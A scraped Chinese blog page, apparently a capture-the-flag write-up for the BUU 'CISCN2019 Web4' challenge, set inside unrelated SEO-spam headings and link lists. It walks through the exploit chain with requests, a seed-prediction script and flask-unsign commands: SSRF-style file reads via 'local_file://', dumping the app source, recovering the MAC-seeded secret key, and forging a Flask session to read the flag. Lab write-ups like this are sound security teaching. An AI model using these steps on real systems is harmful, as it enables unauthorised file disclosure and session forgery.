当前位置: 首页 > news >正文

做微信商城网站哪家好排名app

做微信商城网站哪家好,排名app,微信如何自己创建公众号,建个电子商务网站多少钱BUU [CISCN2019 华东南赛区]Web4 题目描述#xff1a;Click to launch instance. 开题#xff1a; 点击链接#xff0c;有点像SSRF 使用local_file://协议读到本地文件#xff0c;无法使用file://协议读取#xff0c;有过滤。 local_file://协议#xff1a; local_file…BUU [CISCN2019 华东南赛区]Web4 题目描述Click to launch instance. 开题 点击链接有点像SSRF 使用local_file://协议读到本地文件无法使用file://协议读取有过滤。 local_file://协议 local_file://与file://类似常用于绕过可以直接读取本地文件内容 此外不加协议直接通过文件名读取文件也行。 /read?url/etc/passwd读取后端源码 /read?url/app/app.py源码如下 import re, random, uuid, urllib from flask import Flask, session, requestapp Flask(__name__) random.seed(uuid.getnode()) app.config[SECRET_KEY] str(random.random()*233) app.debug Trueapp.route(/) def index():session[username] www-datareturn Hello World! a href/read?urlhttps://baidu.comRead somethings/aapp.route(/read) def read():try:url request.args.get(url)m re.findall(^file.*, url, re.IGNORECASE)n re.findall(flag, url, re.IGNORECASE)if m or n:return No Hackres urllib.urlopen(url)return res.read()except Exception as ex:print str(ex)return no responseapp.route(/flag) def flag():if session and session[username] fuck:return open(/flag.txt).read()else:return Access deniedif __name____main__:app.run(debugTrue,host0.0.0.0)注意print语句print str(ex)可以看出后端是python2。 /flag路由验证了session若session中的username是fuck则返回flag。 session的密钥由random决定random的seed是uuid.getnode()。 random.seed(uuid.getnode()) app.config[SECRET_KEY] str(random.random()*233)对于伪随机数如果seed是固定的生成的随机数是可以预测的也就是顺序固定的所以只要知道seed的值即可。这里的seed使用的uuid.getnode()的值该函数用于获取Mac地址并将其转换为整数。所以我们还需要读一下Mac地址。 Mac地址存贮在/sys/class/net/eth0/address /read?urllocal_file:///sys/class/net/eth0/address得到Mac地址为2e:44:62:0d:63:0a。 根据seed预测伪随机数得到key脚本python2跑 import random random.seed(0x2e44620d630a) print(str(random.random()*233))得到key是73.2021768198不同人不一样。 我们使用flask-unsign工具来伪造session。 解密session flask-unsign --decode --cookie eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.ZW2pEQ.-5oJLoBW97fPu-L4toFRwPeAwhE加密session flask-unsign --sign --cookie {username: bfuck} --secret 73.2021768198 --no-literal-eval得到eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.ZW2rIw.tPiShhd3WU6VOLoSrTgWQus8Pjc 访问/flag路由得到flag
http://www.pierceye.com/news/998415/

相关文章:

  • 网站制作厂家政务网站开发方案
  • 爱站工具卡片式网站
  • 计算机网站开发图片湛江城乡建设局网站
  • 广州个性化网站开发代做网站关键词
  • 如何开发一个手机网站北京推广网站
  • 企业网站建设合作合同wordpress国产定制主题
  • 万网虚拟机怎么做两个网站网页设计实训步骤
  • 福田做网站公司怎么选择wordpress怎样在列表页使用瀑布流
  • 做导航网站用多大的空间广州天河区有哪些大学
  • 广州市城乡建设部网站首页做婚礼设计在哪个网站下载素材
  • 网站建设推广服务合同范本什么是电子商务专业?
  • 青岛网站建设公司电话棋牌室的网站怎么做
  • 网站更改公司需要重新备案吗传媒网站
  • 海诚网站建设青岛李村网站设计公司
  • 哪个网站可以宣传做的蛋糕网站商城微信支付接口申请
  • 如何做淘客推广网站可信赖的手机网站设计
  • 西城专业网站建设公司哪家好外贸网站优化谷歌关键词排名
  • 先做网站后备案仿做网站可以整站下载器吧
  • ASP.NET实用网站开发 课后答案开发网站过程
  • 做网站需要编码吗仿站网站源码
  • 响应式网站什么意思爱南宁app下载官网最新
  • 自己做的网站怎么添加采集模块网站管理包括哪些内容
  • php做网站验证码的设计电商网站的二级怎么做
  • 广西网站建设价钱微信crm管理系统
  • 福州网站建设公司中小企业荆门市城乡建设管理局网站
  • 建设信用卡网站首页有做车身拉花的网站吗
  • 怎么做婚恋网站织梦网站推广插件
  • rtt全民互助平台网站开发自己怎样做免费网站
  • 建站模板东营建网站公司
  • 如何用vs做网站网络推广方案下拉管家微xiala11